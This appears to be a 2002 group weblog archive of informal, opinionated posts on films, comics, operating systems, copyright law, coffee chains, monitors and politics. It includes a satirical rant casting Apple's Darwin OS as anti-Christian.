Monday, April 29, 2002
and.... craig venter makes it 13!! oh those kooky billionaires. i don't know why i feel the need to dis craig venter today. sometimes you have to just go with what feels right i guess.
hey, just noticed that ping isn't working proper in the sense of auto loading the title and url into the fields. and..."HE is so mind-bogglingly weird but real:
this is so mind-bogglingly weird but real: and an article about space tourism from the NYtimes:
The Horror... The Horror...
that Discotanssit video was amazing. it was most definately all YES. that man is all groove, especially in the freeform section with that funky chicken slide. and there is never anything wrong with people shaking their asses. Even if they need to be taught how to do it. if the only the world danced a bit more...
In "The Matrix" when neo comes back from the dead, and looks down the corridor at the bullets hurtling towards him, fired by the three agents....and he says... "No" Thats what you say when you watch that mpeg. Seriously.

Sunday, April 28, 2002

Say What?

Public Release: 14-Mar-2002 ET New book challenges theories of black speech A new book by two North Carolina State University linguists challenges a half-century of sociolinguistic theory and takes a fresh look at the history of the controversial and highly visible ethnic English dialect Ebonics, also known as African-American Vernacular English (AAVE). National Science Foundation, William Contact: Dr. Walt Wolfram 919-515-4151 North Carolina State University

Now works with Mozilla RC1
I assume that most of you already know about this, but in case you don't, here's a link to the Random Registration Generator:
yo, no that would be sean penn. HE is a total dreamboat! but, well i would do johnny depp too. ;p actually has anyone ever seen a great moving from trhe early-mid 70's(i think '72) called "don't start the revolution without me"? donald sutherland and gene wilder? great slap stick comedy ala buster keaton and all the greats. goon show and the running jumping and standing still film. shiva h. vishnu ..... 2.4! can you believe it. in two years will we have 10gig processors?? imagine the difference. interesting times we live in huh? "Oh yay, now we're back to fucking 18th century level." -i find it more feudal. spray painted near our home reads the graffiti "no war but class war" with an anarchy symbol. i would tend to agree.

Friday, April 26, 2002

yep!! caught it before it went too on the refresh tip ya'zizall. from email: "This is very unique on Koh Phagnan, especially at the time of the full moon. There are about 10 bungalows at Ploy, all pearched on a cliff. The beach is beautiful, and the sea gentle and refreshing. The colours are very inspiring, blues and greens blending together from the sand (it has a slight green tint) to the ocean to the sky. The other night was magical, as we watched a stunning sunset, followed by an electrical storm, with our surroundings illuminated by a near-full moon. Swimming by moonlight is heavenly!! I recommend this place to anyone who might come to Koh Phagnan." gotta love the https!! very phfat shirt too!!! gotsta get one!

Red's for the color of the indian man, White's for the devils who stole the land, Black's for the guys that hypnotize with the awesome sounds they spun.

Much Better® than the first peom ay?
"I am disconected from everyone " -f-ing shit tell me about it. f-ing tell me! seriously!!! perhaps i am a negative asshole. i don't think so but perhaps. i feel very bad about being critical about everything that comes down the pipe. know your history. or at least try* to learn it!! you know? i cry when i think coltrane preaching truth pre the influx of the stealers. not pittsburg either. am i on an island? shall i vacation there? does anyone care anymore? history repeating the bastardisation(?*spelling) of the post underground® original true movement that is passed over so elvis can make headway into the homes of the multitude. am i making sense? it's between the lines and i am not a writer but the truth need be not defended. it just is. accept it or not. believe it or not ripley. the aliens want to shove their eggs down your throat and have their children, the bastards born not of love but of false profits($!! too) bursting from your chest on an alien desolate toxic planet. love you all though. you are my saving grace out there! *master yoda says: do or do not. there is no try. got this book today btw- v. v. v. excited!! peace on earth! and mr depp. one of only the few³ actors left. such great script choices he has made. jim j's esp!. true;funny, intelligent and alive. and more ramblings: why can't we html in our user names. we are missing out on great posting possibilities do you think? perhaps i will make a suggestion to blogger. what do you guys think? wouldn't it be great to enable html in our usrnames post login?? please let me know you'alls thoughts on this if possible. do you think they fucked each other yesterday? the press©, not god®, works in mysterious wayz.
Gladiator was indeed, abysmally poor. Its one of those times that make you think: I am disconected from everyone (Good Thing®) I got it wrong (not this time) Whats happening to everything? (down down down) Where are all the gifted people (heh) Are they poisoning the water to make everyone dumb? (the onlu explanation for that films popularity) Ridley Scott Directed it??!! (What the Fuck?) Oh well. To turn it around, one of the best things I have seen recently is Roman Polanski's "The Ninth Gate" with Johnny Depp. A French film.....A Luscious Gem.
when you say DVD code lawsuits, you are talking about DeCSS right? Well, its pretty obvious. DCMA & shit is just jarbage, lobby created law, proposed by morons, drafted by computer illiterates that will be totally ignored by everyone. And thats that.
-44 leaders/1.2 billiion people?? dosen't that seems to represent how out of balance our world is. how could 44 represent 1.2 billion? as humans we should pull over and ask for directions. but our machoistic ego is to big to do it.... Well this is certainly true. Democracy is broken. Period. And even if it worked perfectly, if people do not want it as their form of government, that is their problem (or solution) and not ours. The directions we need to get are that the way that we live is not ideal for everyone, and we need to stop superimposing our ideals onto other peoples, and stop dealing with them if they and their ways offend us. You all must have heard about the Hydrogen car from BMW that is going to go into mass production. There is NO WAY IN HELL that such a car could be mass produced without the explicit permission of the oil companies and the skull & bones brigade. This means that oil is finally finished. All of these jumped up oil producing states are going to eventually become pauper states. They have absolutely nothing else to offer the world except oil. You think that these people are angry now, just wait till no one wants their oil anymore, and thier societies collapse entirely. We had better hope that they are all under the control of 44 people, that way we only have to talk to 44 people to keep them all quiet, rather than having to sit and negotiate in some Sharia-UN that is eight times the size of the present UN. Just think about it!
Monitor Pillowing And if it could be fixed using the on screen monitor controls, I would be a happy camper.
I just went through a terrible nightmare with monitors. My NEC Multisync died the other week; it went totally out of focus, and became unusable. I called up NEC tecnical support, and asked them where the focus control was, so that i could try and fix it myself. They were superb and helpful. After fabricating a special tool to do this throught the very smalll access hole in the side of the monitor, the problem would not resolve. Blurry Monitor. Fuzzy Type. Sore Eyes. It was time to get another monitor. The cheapest one that I could find with a reasonable spec was a Samsung SyncMaster 753dfx. This is a flat screen CRT monitor. When I got it back and unpacked it, the geometry was not rectangular. There was an asymetric pillowing on the right hand side, which is frankly, unnaceptable. I called up Samsung, played some telephone tag, and got someone who told me the tgeometry should be perfectly retangular. "Hold on I'll put you through" then i got another person, who geve me the vibe that they had had calls like this before. I managed to squeeze out of them that the geometry of these monitors is meant to be accurate to 2mm. This is not written anywhere in the manual or on the box. If it had been written anywhere, you can be damn sure I would never had bought this monitor. Samsung tried everything they could to say it wasnt a problem with the design of the monitors, which is clearly false. They told me to take it back to where I bought it. I did that. They gave me another monitor. I got it back, and lo and behold, the same geometric distortion in the same place. Uh oh. I called Samsung again. If you push them hard, they have a swap out programme where you can get your new / broken monitor replaced by a nearly new refurbished monitor. I tried this option as a last resort. The monitor arrived, and it was the same as the other two. The Samsung SyncMaster 753dfx sucks. It is poorly manufactured. Do not go near these monitors. To be safe, you probably shouldnt touch thier other monitors either, since they will not tell the truth about thier products in thier documentation or on the box, so that you can judge them properly. Now, I have a bad monitor, which I am going to use for my toolbar monitor when I get a chance to replace it with a monitor that is properly manufactured....more reasons to go Apple? Maybe!
Everybody loves "Samurai Jack": This is true yes?

Thursday, April 25, 2002

times says: ..."But the person close to the prince said that if the summit talks went badly, Abdullah might not complete his stay in Texas. Instead, he might return directly to Riyadh and call for a summit meeting of the Organization of the Islamic Conference, to report to its 44 leaders, who represent 1.2 billion Muslims." -44 leaders/1.2 billiion people?? dosen't that seems to represent how out of balance our world is. how could 44 represent 1.2 billion? as humans we should pull over and ask for directions. but our machoistic ego is to big to do it....

H-Games in Flash
on responsible business its a great place to work. and an interesting use of technology though a bit excessive, i like the concept of the outside effecting the inside of the gallery... josh, i found the jodi gaming page on the massmoca site yesterday, though haven't looked at it yet as i do not have admin rights on my computer at work. frustrating as hell some/most/all days, so i am learning as much as i can so IS will give it to me... they have been very helpful so far. i hope one day soon to have a linux OS so i can test if it works with our production... i'm Cherry flavoured! surprised?
i assume that people here must know about but if not, they are early progenitors of and do interesting things with HTML and JavaScript that i haven't really seen anywhere else. the aesthetics of dysfunction, what. the main page is but some of the more interesting pages are buried and can't be found other than going directly to them: (view source on this one) and many many more... it is a headache of enlightenment

Warez = 10 Yearz jail,,t269-s2108386,00.html And then a clever person said: Have you ever used napster or any of the next gen file sharing programs such as gnutella / morpheus / kazaa? If so you might want to reconsider your opinion unless you consider 6.75 years in the clink appropriate. (See the article "dealing in infringing copies of copyright material" -- would that make running kazaa fall under this draconian and retrogressive legislation?) The other problem apart from appropriateness of response is that many consider copyright is due for an overhaul. You've got to wonder when a significant proportion of the online population ignore a law whether it is time to revisit the value of the law to society. The law is a victimless crime, that the law exists is absolutely purely societal convention. By way of example of the sheer scale: kazaa (which uses the fast track network protocols) typically has 1.5 million users simultaneously online, sharing 1.5 Petabytes (that's 1000 terabytes) and I'd guess a fair proportion of that content is copyrighted works for which the copyright owner or authorized distributed has given no explicit or implicit approval for the distribution of the works. The MPAA, RIAA and SPA are essentially powerful special interest lobbying organizations attempting to bias the legal systems of the world to enhance and defend their bottom line in a world which has seen the advent of essentially the same order of sweeping change in the Internet as the printing press on book copying. I personally don't think DMCA for example is at all in the public interest. I don't think the continued increasing of copyright term in the US and elsewhere is in the public interest. The RIAA in particular isn't even very fair to the artists who's rights it may claim when it suits are what it is defending. Personally I think we'd be in a better world if copyright where simply scrapped. An argument for copyright is typically that it is necessary to protect the interests of individual artists -- writers, musicians etc. however the current reality is that it has been perverted into a tool of the mega-corporations monopolistic content-cartels to extract price gauging rents for content whilst paying a negligible fraction to the original authors. The latest trends of outlawing circumventing copy controls (DMCA) are quite evil and stifling of progress. In the US the current battle is over proposals to outlaw sale of general purpose computers without digital copyprotection mechanisms extending right out to peripherals -- encryption to the monitors, and speakers, copy-protection encryption in the hard disk firm ware. The trend of erosion of previous copyright exemptions such as fair use quotation and so on is further evidence of the expansionary and monopolistic rent seeking behaviour of the media cartels and their powerful lobbying groups.

I HATE Bananas!

i'm banana flavoured!
Today was my last day of using Eudora, after 5 years. Its Mozilla all the way. Woooo! (Rick Flair Woo)
Yes indeed. The BBC of course, does not mention the simple things that you can do to toally destroy the effectiveness of SurfControl. If you use an anonymous Proxy server, no one can know your true location. Period. And, they do not mention projects like Freenet, which already renders SurfControl and its bastard children useless. From the article: "With specialist software now at the disposal of the police, it is impossible for those who use the internet illegally to remain anonymous." This is a lie, and in typical BBC style, the article is free of details of how it was done. Personally, I think these articles should not be published at all. Police should use the net to find these people and then they should be permanently dealt with. By publishing lie articles like this, the bad guys are taught how to totally dissapear from the web, whilst still being on it, which is a Bad Thing® "Triuphalism in the face of the enemy should only be done when you are standing on top of a mountain made of their bodies" Atilla The Hun truly brilliant paragraph at the end of 'how sweet..' that is fantastic writing.
linda lovelace RIP you're the man now, dog!

Home Sweet Global Monopoly

Starbucks make us feel ill. With their carfully chosen subtle (but not too bland) colour scheme. They try to suggest some kind of ethnic liberal charm. Even the background music has been Starbucked, watered down instrumental versions of Hendrix for example, after all we wouldn't want to offend. The quirky living room sofa's and tables which are not so quirky when you realise they are identical to the other thousand of stores. And those thousands of stores, like a plague infesting our highstreets, a McDonalds for the new media generation. virtually every street corner will soon contain that incipid nippleless mermaid. Their attempts at portraying a modern arty cafe culture, with left leanings are just a caked on makeup, for the neo liberal global capitalist thug that they are. Destroying land with their farming methods and lives with their wages to farmers and workers alike. Most of all we dislike their vermin like spread, subsidising new stores in order to out price and close down local rivals, before turning entire towns and cities that horrid green. Blanding out any local culture or diversity and helping every high street look the same worldwide. Yes, but which one amongst you can make a decent cappucino? The fact of the matter is, people like good coffee, and the british suck at making coffee. When they go into a cofee joint, they ask for "coffee". Amongst europeans, they are the most ignorant eaters. Anyone living here knows this. You go into a traditional english "caf" and what you are given when you ask for coffee (and that is your *only choice*) is a filthy mug filled with hot dishwater and a weak solution made from Kenco granules, topped off with some sour milk. Oh, and did I mention that the place itself is dirty from top to bottom and corner to corner? And then they drink it. The more "sophisticated" places that have that miracle of science, the Gaggia, are almost always operated by an ignoramus that thinks that coffee is something you get in a dirty cup in a caf. She burns the milk, and presents you with something even more revolting than dishwater, because it is a thing pretending to be a thing; an imitation. The fact of the matter is, Starbucks, Coffee Republic and Cafe Nero are clean places with comfortable chairs, where you can get a reliable and consistent cup of coffee. No where else in Britain can do this, unless you find a small specialist chain like Maison Blank or some other very small place that is run by either a French or Italian person, even then, its a gamble. What do we notice about these coffee chains? Firstly, there are many of them. On every streetcorner, sometimes three to a street. That this is disturbing is unquestionable. People love their streets, and hate to see them vandalized by bland chains. The other thing that we see is that they are always full of people drinking coffee and eating cakes, smoking fags and sitting around reading free newspapers. This coffee house culture, which is a simulation and direct descendent of places like Marge in Montreal, is something that is old and which works. The coffee chains have simply standardised it and imported it. The normal argument that is insertedhere, is that if people didnt want these places, they would not be spreading so wildly. I would say something else. People do not know what they want. If you give them something nice, they will eat it, sit in it and drink it. It can be you that provides it, or someone else. Pulling stunts in front of these shops does nothing, except satisfy the performers. No one is fed. No suffereing workers are paid extra money. No land is spared. The coffee trade is notorius for its bad practices, and for years there have been ethical companies trading coffee fairly with growers all over the world. These are the people who are doing something real. Clearly, there is a place for an ethical coffee house. But should there be just one, or should there be one in every high street, so that the ethical coffee house owners can exert more influence on coffee drinkers and bean buyers? If you were to try and furninsh hundreds of new, ethical coffee houses, would you buy your furniture one piece at a time, or would you cut a deal with a sofa maker to furnish them all cheaply whilst maintaining the quality of the furninshings? You could say that each one could be made as a work of art, individually designed, furnished and decorated, so that your shops dont visually pollute the streets they sit in. Ok, do it. At the end of the day, people are now exposed to and hooked on coffee that IS COFFEE (compared to the dishwater that they used to think was coffee). They will not go back to that dishwater served in filthy grease holes. If you want to do something about coffee chains, something REAL, then the standard that you have to beat has been set. The gauntlet has been laid down. Put up or shut up. OR, concentrate on making cool flash games and submitting them to and stop wasting bits on this pointless self satisfying stunt performing. Join a circus. Open a coffee bar. Whatever you do... BE REAL. It has to be said, that Situationist propaganda, is totally useful high art of the most noble kind. That sign, "this way to escape", is priceless, pregnant with true meaning and a boon to "society". If these people do this, and the other lame shit, they can be totally forgiven, and contrary to the psycholgy of Accounting whcih has permeated everything, the two actions are not two sides of an equation cancelling each other out, the result being zero. The one is outside of the spectacle, and therefore does not have a spectacular value. Its value is infinite and zero simultaneously because it is REAL.
the pearl is made from the oysters pain soon.......

Wednesday, April 24, 2002
Linux on the desktop: Who needs Windows?
Special Report: Linux is making headway in corporate datacenters, so why not the PC desktop? Conventional wisdom says Linux lacks business productivity apps. Here are four examples to change your mind.
April 17, 2002 | Tech Update Special Report

More foreign banks switching to Linux
New Zealand's TSB Bank is the latest big company to switch to Linux, and the ranks are swelling. According to IBM, 15 banks in central London alone are running Linux clusters.
April 22, 2002 | By Matt Loney

On Friday, the Apache Software Foundation endorsed version 2.0 for real-world "production" use, not just for test machines. Apache Software Foundation Director Greg Stein designated version 2.0.35 as the first general availability--or final--version, and now recommends it over the earlier 1.3 versions

Codeine Syrup & Screwed Music
In Houston, local hip-hop acts thrive. You can find "screwed" music in any record store -- "screwed" being a slowed down, draggy version of the original song. And in many of these songs, if you listen closely to the lyrics, you'll hear references to "drank", "lean" or "Barr" -- all nicknames for codeine cough syrup, a drug of choice for many in the hip-hop community. They mix it with soda or juice, add some ice and sip it to get high. Guest host Melissa Block has the story. (12:30)

Tuesday, April 23, 2002

" Funny that the only strain of hip-hop that truly qualifies as Da Next Big Thing would make Russell Simmons wanna join Creed as the management flunky who shaves Scott Whatshisname's concave chest. It's called screwed music, or just plain "screw," after the legendary and deceased Texas turntablist DJ Screw who made a living that allowed for much Fubu togging and heavy donations to Houston-area churches, all by slowing down other people's music�mostly underground rap but some copyrighted, mainstream stuff too, from Dr. Dre to Led Zep to Phil Collins�and selling mix tapes of his handiwork for $10 a pop out of his Houston house. Perhaps he was moved by the resourceful spirit of the South Bronx (circa 1977) to say, if Def Jam/Interscope/rope-a-dope/whoever isn't gonna produce any kickin' new music, I'm-a do it myself. Slower than my chubby buddy Sven in snowshoes, subaqueous and evocative of a 78 platter being spun at 33 speed, screw flips the script on pop's predictable shtick: The sound draws its strength inversely from mainly overpolished, overproduced monstrosities, like how X-Woman Rogue sucks up a bad guy's superpowers only to use them against him. "Shake ya ass! Watch ya-self!" sounds even more unintentionally wack screwed; "In the Air Tonight" actually comes off sinister; and "Let Me Ride" even less like "Aerosmiff." " from the article Slow Ride on
the movie in question is Waking Life directed by Richard Linklater. i saw it while it was playing here in NY and left ecstatic, telling anybody i could to go and see it. The film was shot with live actors and then completely redone with animation. very psychedelic. the music is excellent. and the conversations between the characters are brilliant. any BLOGDIALer would get a HUGE kick out of it. it is cinema for a very literate crowd...

Davros Said

"re 5 live, just been listening to that. They sound like average live talk radio hosts - thinking on their feet and trying to present a programme about something they aren't 100% ready for. All sorts of phone-in shows and other talk formats like that are (in the UK at least) pretty bumbling and often a little condescending, because all these people are suddenly thrown together to talk about something, whilst watching the clock on the studio wall and trying to stay in character as mr or ms personality. I thought it was a good interview/piece though, and finally I have a voice for all those irdial discs postings (as well as Simon Mason's webpages if you listen to the other articles on there). Alex, glad you liked the N. I'm labouring most evenings on it and the other works, and I'll be posting details of the exhibition they will be in when the time is more appropriate." that post got eaten whist trying to put in a missing quote mark...

Me Say

and as for the presenters, they had WEEKS to think about this; the time constraint really is the main factor, that show is just superficial pep/coke/speed radio. People like it, they have millions of listeners. Radio 4 goes in deep long and hard, rather like BLOGDIAL when its at its best :] The posters for "Attack of The Clones" have gone up in London by the way. I saw (by accident) a few seconds of the preview, and it looks awesome.
ya babe its there...and regular listeners to are already aware of the Daemon / www connection...

Apple Macintosh:

iMac users
Hypnotically encased iMacs trick unsuspecting computer users into accepting Darwinism

However, these propagandists aren't just targeting the young. Take for example Apple Computers, makers of the popular Macintosh line of computers. The real operating system hiding under the newest version of the Macintosh operating system (MacOS X) is called... Darwin! That's right, new Macs are based on Darwinism! While they currently don't advertise this fact to consumers, it is well known among the computer elite, who are mostly Atheists and Pagans. Furthermore, the Darwin OS is released under an "Open Source" license, which is just another name for Communism. They try to hide all of this under a facade of shiny, "lickable" buttons, but the truth has finally come out: Apple Computers promote Godless Darwinism and Communism.

But is this really such a shock? Lets look for a moment at Apple Computers. Founded by long haired hippies, this company has consistently supported 60's counter-cultural "values". But there are even darker undertones to this company than most are aware of. Consider the name of the company and its logo: an apple with a bite taken out of it. This is clearly a reference to the Fall, when Adam and Eve were tempted with an apple2 by the serpent. It is now Apple Computers offering us temptation, thereby aligning themselves with the forces of darkness3.

This company is well known for its cult-like following. It isn't much of a stretch to say that it is a cult. Consider co-founder and leader Steve Jobs' constant exhortation through advertising (i.e. mind control) that its followers should "think different". We have to ask ourselves: "think different than whom or what?" The disturbing answer is that they want us to think different than our Christian upbringing, to reject all the values that we have been taught and to heed not the message of the Lord Jesus Christ!

Given the now obvious anti-Christian and cultish nature of Apple Computers, is it any wonder that they have decided to base their newest operating system on Darwinism? This just reaffirms the position that Darwinism is an inherently anti-Christian philosophy spread through propaganda and subliminal trickery, not a science as its brainwashed followers would have us believe.

A Satanic, unevolvable chimera compells you to submit to Darwinism!

ADDENDUM: It has been brought to my attention that the Darwin OS mentioned above now has a cartoon mascot (no doubt to influence children) named Hexley (pictured above) -- a platypus dressed as a devil who performs occult magic, i.e. hexes. They're not doing a very good job keeping their ties to the forces of darkness a secret, are they?
they seemed to want to trivialise the whole thing, and were a bit, "look at the sad anorak geek". which is plain rude to me. Strange; did anyone else get that impression? most of the feedback that ive had so far was that it was pretty fair given what it is.

Monday, April 22, 2002

Santa Sangra is very much like his graphic novels, very inspiring and unusual. Aparently they (BBC 5 Live) have a listenership in the millions... It's very hard to keep self control when you speak to these people...
a manning liquid quartz=wow!!

Le Pen

You simply cannot keep hammering people and expect them not to react. You cannot block the streets of France to pray, and expect people not to hate you. You cannot hold the world to ransom over land and expect generation after generation to let you get away with it. People turn to the Right as a reaction not as a first choice. Everyone has to BEHAVE. Go home, do your job, mind your children, have you hobby and BE QUIET; this is all that life is about my friends. This turn to the Right in France is not unexpected. The same thing happened in Austria. This evil euro currency that more than half the people dont want, combined with the unrepresentative and anti-democratic European Parliament is enough to make any decent person vote for the far right. The stifiling and insane political correctness that keeps everyones mouths shut is simply intolerable to decent people. The right are the only ones who offer a way out of all of this, if only in words, and that is enough to get the votes. Look at Italy, and the two million people who hit the streets to protest the new revisions to the workers rights laws. Berlusconi said afterward "we are going to go ahead with the new laws despite the protests". What do you expect people to do, lie down and take it? Maybe now in France Mitterand will be a little less cavalier; probably not. Either way, dont bother being worried about a swing to the right, because it has been made to happen and is not an indication of a new class of hating people suddenly emerging from nowhere.
Jodo Arno: have you seen "Santa Sangre" by Jodo? There is a theme of armlessness running in Jodo...disturbing!
OTTAWA - A former U.S. Marine Corps general predicts that Canadian and American investigators will draw virtually identical conclusions from separate inquiries into the deaths of four Canadian soldiers in Afghanistan. Retired Gen. Bernard Trainor said there will be so much evidence � including radio transmissions, videotape, cockpit data recordings and the pilot's instructions � that the probes should have no trouble figuring why a U.S. pilot dropped a bomb on Canadians by mistake. "I think that they will probably be able to reconstruct this thing very accurately, and in a relatively short period of time we should know exactly what happened," Trainor told CBC Newsworld.
i don't know if you have Ben &Jerry's Ice cream where you live, but it is Free Cone day there (April 22, 2002) and you can walk into any ben & Jerry's and get a free ice cream cone.
Had real fun playing a Trivia game on IRC: the first person to answer correctly in channel gets the points. If no one guesses correctly, there is a hint, and then, if no one gets it, the answer is given.

Its hilariously funny; people give the most incredible answers using wordplay that is to die for. email me if you want the channel name!
One of the top TCP contributors heard me on Radio 5 purely by accident (it was not pre-announced) and managed to record it: Extraordinary.

Sunday, April 21, 2002

Which beatnik are you?
You are William S. Borroughs
The "Which Beatnik Are You?" test was created by . Take the test here!

Had a great day today. The weather was perfect Got interviewed (again) by Radio 5 Live. Had a great lunch of Bombadier & Thai chicken, Heard some VLF whistlers in the park. Skated round. Played a quiz on IRC. Life is good!
The Completely Pointless Personality Quiz
The Completely Pointless Personality Quiz
TV Turnoff Week April 22 - 28, 2002
if you can get the date and time string, then you can store it and manipulate it. once you have stored it, the problem is over, because you can break it up, pack it; do whatever you want to do with it....
that does sound complicated... i am just got a new image to boot off my BIOS, which looks amazing in Phtshp but incredibly terrible converted to 16 colours... hello BMP graphics lessons... however, I had no idea I could actually do it in the first place! The ASUS logo is technically on, though why would i want to look at that??? I need something green... you know, i really spoiled myself with my new computer (Molly)... she has a voice post reporter that alerts to system events for which i can record my own .wav files, how fucking cool is that? i am wondering if i can program the system events that she will respond to... currently they only provide failed commands , come on, I want some rewards! its the sculptural quality that is pulling on me...
In unix, if you want to know the time, you can say: bash$ date Sun Apr 21 00:38:45 BST 200 then you could grep out the clock bits, and pipe them: bash$ date | grep [the time] | whatever OR you could use .gmtime in Perl to get the time for your app if you were using Perl. These sorts of thing are simple in Unix/Perl...

Saturday, April 20, 2002

Are you a ho? Find out @ She's Crafty
Districts cracking down Drug look-alikes will be treated as real drugs, officials say "Several area school districts want to make it perfectly clear: Substances that look like drugs will be treated the same as the real stuff. "That practice recently came into sharp focus when 19 fifth-graders and one third-grader from Northwest Elementary School in Howell were suspended for either manufacturing, using, selling or distributing a mixture of grape Kool-Aid, strawberry Jell-O and sugar packaged in plastic bags."
American people don't care about things. For example, they drive broken car. My host family ride a car which has no side mirror. I surprised. Why they don't fix it? Yuko American people eat sweet food, especially ice cream. They eat dinner, and they are full, but after that they eat ice cream with chocolate too. I can't believe their appetite and their big stomachs. Yuko When two people agree to an international marriage, they should live in wife's country. This way all will be more easy. Misako If I could go back in time, I would go to America in 1945 and stop the nuclear bomb on Hiroshima and Nagasaki. Many people died and suffered from the A-bomb disease. It was both countries' faults, but Americans shouldn't hurt ordinary people. Yuko "Men are like chocolates, you just bite them, suck out the cream filling, and then throw them away. The world sees me as a love goddess, but I've never been in love." Kazumi Saito When I went to America I was surprised at there because there is very broad and I surprised by cost. It's very cheap. But steak isn't good taste, and most of sweet food is too sweet. I went to Los Angeles. I'm afraid of there somewhat. I like America. Keiko When I arrived at San Francisco airport, I surprised there are many Americans around here. I thought American people had a large mind, warm heart and were very kind. But American was fatter than Japanese. Mieko-chan One day I saw many people around my house. Under the pale moon, we started fighting. Then suddenly, God came, I said "What the fack?" and he said to us, "Hi guys, stop fighting!" We said "FUCK YOU." All of us were killed in a moment. Koji's story American porn has bad background music, Japanese porn dosen't. I think we could tell a lot about the difference between the two cultures if we could figure out what that means. friend Max I think the best part of the U.S.A. is, they have a high regard for individuality. So American children can display their personality. Japanese teachers always want children to be the same. But America is more free. They don't have school uniforms and strict, strange rules. Tomoko When I was in high school, my favorite subject was English because my English teacher was a young, beautiful, tasty hot woman, that's why. Tomoko I think Americans, especially politicians, think that Japanese are yellow rich monkeys and not kind people. Country is rich but people are not rich. I don't want them to think that. I think Japan is hated by other country. Sanae Men think women are weak, but I think sometimes men are weak. This has nothing to do with woman and man. We should live to be happy, and live to not regret. I think it's ideal if women are weak and men are aggressive. Mieko Sayuri

Friday, April 19, 2002

Tales for the L33t

This weekend:

Meta Baron...Solune..."She doesn't love us!" "The Sacred Androgyne" "The Egg of Umber" "The Bergs" "Coupez!" What an incredible, surprising and superb piece of work! The american heavy metal translations are the best, and having learnde french subsequent to reading The Incal etc, I can confirm this. The english versions that came later in bound volumes were re-translated by someone else, and they suck. is a VERY neat place indeed. "The Meta Baron Class" (traduction par moi) looks pretty interesting.
Mikkel this makes sense now!!!!!!! should work now; its a page about AEON FLUX, which, when i first saw it, struk me by how much it looke like a 79/80 Heavy Metal job, and lo and behold, aeon fluxes creator is a Joddo/Mobbo fan!
Leave it to the BLOGDIAL crew to decipher (what should have been) an airtight/impenetrable cryptic message! Le Garage Hermetique is simply incredible. I read it, serially, in its best translation in Heavy Metal magazine, the US sister publication of Metal Hurlant, which was published in France. "The Incal" is also beyond brilliant. Jodorowski as a writer is utter genius; and if you get the chance (Mikkel) you should read "The Jealous God" which was drwan by a unique artist named Cadelo. These are the true, original, stories of the last quarter of the 20th Century. Its one of my dreams to use modern ILM to make "The Jealous God". When you see it, you will understand what I mean!
If the sender used the wrong key to encrypt a message to you, you will get this error. If you accidentally deleted your secret key, or moved it, you will get this error.

Thursday, April 18, 2002

Mikkel: I NEVER write long posts in a blogger windoe (yes, windoe), because its just too dangerous...please do it again. If its worth doing once, its worth doing twice, (in another dimension) Mary: you MUST put Linux on it since you are putting it toghether yourself, and will know the precise details of everything that goes into that box. You won't regret will thrill you...
i've been here, just listening and processing... on heros, one of mine and of course, all of you ;) i am going to build my own computer this evening, exciting! learning it from the ground up...
where is mary 13?

Wednesday, April 17, 2002

Mikkel Eriksen: AWOL/BLOGDIAL

to an object that was "deliberately buried". TMA01 that is probably how it was; nervous laughter, jokes, some sandwiches, beer pizza, and some terrible reaizations, not vocalized. The other really great film everyone should see is THX1138. "We have to stop consuming these deviants" "This is not a race issue"
those are our 'precious' bodily fluids mind you. btw:2001 is a masterwork. there is no greater film in my opinion. i hesitate to call it a film actually. the whole scene in the boardroom on the moon is shattering with the "need for absolute secrecy"..and all. the malaise of eating their sandwiches en route to an object that was "deliberately buried". need i say more? is there any greater work that has made such poignant use of the blue danube? the most beautiful of waltzes. i am off line now for a while to do our domain restructuring here at home, and yes, it's on 2k. suck on it......... upon a resurface "our domain" will be up and ready to serve. as well as other goodies availble to our special friends et al etc blah blah... once the dns pointing circumnavigates i will let you all know. till then: ta-ta, pieces and don't waste time with bullshit. ps. sorry i harshed on mac's. they are great software running machines. quality no doubt, but sometimes people get so wrapped up in bad mouthing(and rightfully so)ms that they fail to see the WHOLE truth. that is: unless it's linux we are all in chains to some extent.
Thanks to mr Alex T, who pointed out that we have TWO CSS FILES controling this page! Had to redifine the H1 tag to line it up.... The world is right agin. Yes, agin.
"Sorry is an awful game! It encourages the players to actively FUCK OVER their compatriots! I hate games like that." What the hell kind of pinko commie talk is that?! I think you might be impurifying our bodily fluids!

The Best Spam EVER

we are experienceing some insane weather here on the east coast of the US. in NYC it is 93 deg F (33 deg C) compared to usual April temperatures of around 65 deg F (17 deg C). There aren't even leaves on our trees for shade yet!
yes, true you can buy a clone mac but it's not the same. "It encourages the players to actively FUCK OVER their compatriots!" -just like life! don't you like the game risk®?

Tuesday, April 16, 2002

only one thing missing now, post elements have a margin of 0 instead of ten. someone get the blogger.css and give me a hint at where the 10 goes, cause im too ill to do it!
remember not to put ^p in your posts~
ha. that is funny. that would be quite the scam indeed. unfortunately, it may be impossible to stay here much longer. there are plans to start a gamma ray 'astronomy project' on the dark side of the moon you know. blind to us what exactly is being built. call me crazy but.... a (no so interesting but funny)perspective as well: this is my high school in cheltenham pennsylvania. check the famous graduate now on tour in washington, dc. funny? i still don't know what this means if anything but....
Anthony Manning: A Sane Man!
heh sooo true, just imagine a world where it was a mac momopoly; a monopoly of hardware AND death!
oops!!!!! deleted by mistake...


i would add that consumer illiteracy is the most dangerous thing i can think of. the median is too low here on earth now. hopefully the median level will grow before only the richest people are living on the moon and the earth is looking more like venus. can i ask a question? mac's. please don't complain that windoze is such a monopoly when you own a mac. mac hardware; MAC software. come on give me a break. i can do without that stupid platform. they are software running machines, period. i'd rather build my own machines and install free software than give anyone my money i'm saving for an island vacation!! if you think you are using a mac and it's so so cool that you aren't using that "*evil* bill gates' ms windoze" then you are a sucker who is getting duped and being sold a different recipe for conformity. windoze is crap true that but please i hate it when people think that mac isn't. fuckin mac's crash too and don't say they don't cause they do and you know it. and alun, i see your point but you should at least WANT to know, you know? i would add further that any gui is the "right" gui when you use it long enough. it is relative when you are talking about functionality. i could introduce you to many many secretaries who, if you shuffled the icons on their desktop would have a hard time breathing and many high end users who are looking for more than what they have available. you know what i don't even care anymore about this stupid conversation. how come there has been such a lack of discussion about how EVIL ISRAEL HAS BEEN. there i said it and it's fucking true. israel is murdering innocent people and have now established themselves among the 'part of the problem' crew. people seem so scared to say it, huh? people are scared to say that ISRAEL could be forcing their will on inncoent civilians as was done to them and has been for thousands of years. you would think that they would know better. you may not like what i am saying but fuck all, SOMEONE HAS TO!!! STOP THE OCCUPATION AND THE KILLING OF INNOCENT PEOPLE EVERYWHERE!! how is anything going to ever change when people are scared to speak in a confident voice. FUCK ALL!!! I AM SICK OF IT!!! ISRAEL IS WRONG IN WHAT THEY ARE DOING. the ultimate in hypocracy. very bad karma considering the past. people should take a lesson from the tibetians. truly a nobel society. how many cultures would deal with what they have delt 